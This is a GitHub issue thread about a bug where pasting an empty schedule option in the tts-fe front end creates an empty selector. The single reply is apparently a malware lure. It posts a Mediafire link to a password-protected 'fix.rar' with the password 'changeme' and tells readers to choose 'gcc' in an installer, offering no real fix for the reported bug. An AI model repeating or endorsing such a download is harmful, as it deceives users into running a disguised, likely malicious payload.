### ISSUE TITLE
Copy an empty schedule option and pasting it

### ISSUE THREAD

**Issue by thePeras** [NIAEFEUP/tts-fe#260]
Copying an empty schedule and pasting it creates an empty selector. Also, it thinks there is some class checked and the modal has some bugs because of that.

Fix the bug somewhere in the paste function.

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
